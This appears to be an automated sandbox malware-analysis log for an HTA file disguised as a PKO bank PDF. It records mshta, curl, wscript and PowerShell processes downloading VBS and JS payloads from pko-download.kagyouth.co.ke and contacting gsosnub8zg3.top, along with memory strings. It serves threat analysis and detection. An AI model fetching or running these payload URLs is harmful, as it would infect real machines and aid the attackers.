Source: global traffic | HTTP traffic detected: GET /js/riodfc.txt HTTP/1.1 | Accept: */* | Accept-Language: en-ch | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: pko-download.kagyouth.co.ke | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /js/pmxdhq.txt HTTP/1.1 | Accept: */* | Accept-Language: en-ch | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: pko-download.kagyouth.co.ke | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /1.php?s=mints21 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: gsosnub8zg3.top | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /1.php?s=mints21 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: gsosnub8zg3.top | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: www.google.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: www.google.com | Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /676198543e20a/js/676198543e135.js HTTP/1.1 | Accept: */* | Accept-Language: en-CH | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: pko-download.kagyouth.co.ke | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /676198543e20a/676198543e2f1.vbs HTTP/1.1 | Accept: */* | Accept-Language: en-CH | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: pko-download.kagyouth.co.ke | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /676198543e20a/676198543e2f3.vbs HTTP/1.1 | Host: pko-download.kagyouth.co.ke | User-Agent: curl/7.83.1 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /list_files.php HTTP/1.1 | Accept: */* | Accept-Language: en-ch | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: pko-download.kagyouth.co.ke | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /list_files.php HTTP/1.1 | Accept: */* | Accept-Language: en-ch | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: pko-download.kagyouth.co.ke | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /js/riodfc.txt HTTP/1.1 | Accept: */* | Accept-Language: en-ch | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: pko-download.kagyouth.co.ke | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /js/pmxdhq.txt HTTP/1.1 | Accept: */* | Accept-Language: en-ch | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: pko-download.kagyouth.co.ke | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /1.php?s=mints21 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: gsosnub8zg3.top | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /1.php?s=mints21 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: gsosnub8zg3.top | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: www.google.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: www.google.com | Connection: Keep-Alive
Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: *href=https://www.youtube.com/?tab=w1><spanX equals www.youtube.com (Youtube)
Source: global traffic | DNS traffic detected: DNS query: pko-download.kagyouth.co.ke
Source: global traffic | DNS traffic detected: DNS query: gsosnub8zg3.top
Source: global traffic | DNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 0000000F.00000002.1967997619.0000021C0FC9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.000001590047A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://0.google.
Source: powershell.exe, 0000000F.00000002.1967997619.0000021C0FC9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.000001590047A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://0.google.com/
Source: powershell.exe, 00000011.00000002.2002991318.000001590180F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://gsosnub8zg3.top
Source: powershell.exe, 00000011.00000002.2002991318.000001590180F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://gsosnub8zg3.top/1.php?s=mints21
Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://maps.google.com/maps?hl=en&tab=wl
          Source: powershell.exe, 0000000F.00000002.1982995994.0000021C1F896000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C112CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.0000015910076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015901AC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000011.00000002.2002991318.0000015900228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C0FA47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPa
          Source: powershell.exe, 00000011.00000002.2002991318.000001590047A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.00000159010D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.0000015910011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.00000159102FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015901101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900FEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.00000159010FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPage
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C0F821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000011.00000002.2002991318.0000015900228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.blogger.com/?tab=wj
          Source: powershell.exe, 00000011.00000002.2002991318.0000015901A1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C11240000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/history/optout?hl=en
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
          Source: powershell.exe, 00000011.00000002.2002991318.0000015901A1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=en
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=enX
          Source: powershell.exe, 00000011.00000002.2002991318.000001590044E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com0
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C0FC9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.000001590047A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C0FC9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.000001590047A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google.com/
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015901A1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C0F821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: powershell.exe, 0000000F.00000002.1982995994.0000021C1FB1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C0FE35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C11298000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C0FC82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1982995994.0000021C1F896000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1982995994.0000021C1F82F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C0FC9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C112CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015901A3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900462000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.0000015910076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900615000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015901A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.00000159101D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.000001590047A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.0000015910011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.00000159102FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://books.google.com/?hl=en&tab=wp
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar?tab=wc
          Source: powershell.exe, 00000011.00000002.2002991318.0000015901AC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000011.00000002.2002991318.0000015901AC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000011.00000002.2002991318.0000015901AC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C0FC6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C11240000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1982995994.0000021C1F896000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C0FC9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C112CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.0000015910076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015901A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.00000159101D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.000001590044E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.000001590047A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015901A1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=docs_alc
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?tab=wo
          Source: powershell.exe, 00000011.00000002.2002991318.0000015900228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10955000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.000001590113A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
          Source: powershell.exe, 00000011.00000002.2046174346.00000159102FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C0FE35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900615000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24X
          Source: powershell.exe, 0000000F.00000002.1982995994.0000021C1FB1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C11298000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C0FC82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1982995994.0000021C1F896000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1982995994.0000021C1F82F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C0FC9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C112CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015901A3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900462000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.0000015910076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015901A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.00000159101D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.000001590047A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.0000015910011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.00000159102FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96X
          Source: mshta.exe, 00000000.00000003.1837722113.0000000002BDD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1841957476.0000000002BDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1838091189.0000000002BDE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.1901975042.0000000005990000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1915650487.0000000005D80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=wm
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://news.google.com/?tab=wn
          Source: powershell.exe, 0000000F.00000002.1982995994.0000021C1F896000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.0000015910076000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
          Source: wscript.exe, 0000000A.00000002.1914733283.0000000002F30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1914318772.0000000002D57000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1911913220.0000000002D56000.00000004.00000020.00020000.00000000.sdmp, 676198543e2f3.vbs.4.drString found in binary or memory: https://pko-download.kagyouth.co.ke/
          Source: mshta.exe, 00000000.00000003.1838231650.0000000002B6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1840152370.0000000002B6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1841794584.0000000002B6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/$
          Source: mshta.exe, 00000000.00000003.1826274179.00000000060F4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1841957476.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1842849425.00000000060BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1837722113.0000000002BDD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1842948051.00000000060FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1837722113.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1826274179.00000000060B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1781949139.0000000002BF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1841957476.0000000002BDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1838091189.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1838091189.0000000002BDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1833052728.00000000060FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1840527491.00000000060BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbs
          Source: mshta.exe, 00000000.00000003.1837722113.0000000002BDD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1841957476.0000000002BDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1838091189.0000000002BDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbs(fF$
          Source: mshta.exe, 00000000.00000002.1841957476.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1837722113.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1838091189.0000000002BE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbs.v
          Source: mshta.exe, 00000000.00000003.1829056802.00000000061C1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1829210589.00000000061C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbs0A
          Source: mshta.exe, 00000000.00000003.1828083356.0000000006107000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1825820863.00000000060FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1843031818.0000000006108000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbsLMEM
          Source: mshta.exe, 00000000.00000003.1826274179.00000000060F4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1842948051.00000000060FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1833052728.00000000060FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbsR
          Source: mshta.exe, 00000000.00000002.1842802315.00000000060A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbsdownload.kagyouth.co.ke/676198543
          Source: mshta.exe, 00000000.00000002.1841957476.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1837722113.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1838091189.0000000002BE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbsfv8G2
          Source: mshta.exe, 00000000.00000002.1842849425.00000000060BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1826274179.00000000060B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1840527491.00000000060BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbsi
          Source: mshta.exe, 00000000.00000003.1837722113.0000000002BDD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1841957476.0000000002BDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1838091189.0000000002BDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbss
          Source: mshta.exe, 00000000.00000002.1841957476.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1837722113.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1838091189.0000000002BE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbstv
          Source: curl.exe, 00000004.00000003.1811209809.00000000034D5000.00000004.00000020.00020000.00000000.sdmp, 676198543e2f1[1].vbs.0.drString found in binary or memory: https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbs
          Source: curl.exe, 00000004.00000002.1811679068.00000000034A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbs)
          Source: mshta.exe, 00000000.00000003.1826274179.00000000060B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbs0
          Source: curl.exe, 00000004.00000002.1811679068.00000000034A0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000002.1811615559.0000000003420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbsWinSta0
          Source: curl.exe, 00000004.00000002.1811679068.00000000034A0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000002.1811615559.0000000003420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbscurl
          Source: mshta.exe, 00000000.00000002.1842826002.00000000060B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbsgg
          Source: curl.exe, 00000004.00000002.1811679068.00000000034A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbsk
          Source: mshta.exe, 00000000.00000002.1842663260.0000000005E4D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1839442231.0000000005E4B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1834157948.0000000005E4B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1834220338.0000000005E4B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1833194096.0000000005E4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbss
          Source: mshta.exe, 00000000.00000002.1841794584.0000000002B6E000.00000004.00000020.00020000.00000000.sdmp, PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.htaString found in binary or memory: https://pko-download.kagyouth.co.ke/676198543e20a/js/676198543e135.js
          Source: mshta.exe, 00000000.00000003.1838231650.0000000002B6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/676198543e20a/js/676198543e135.js3
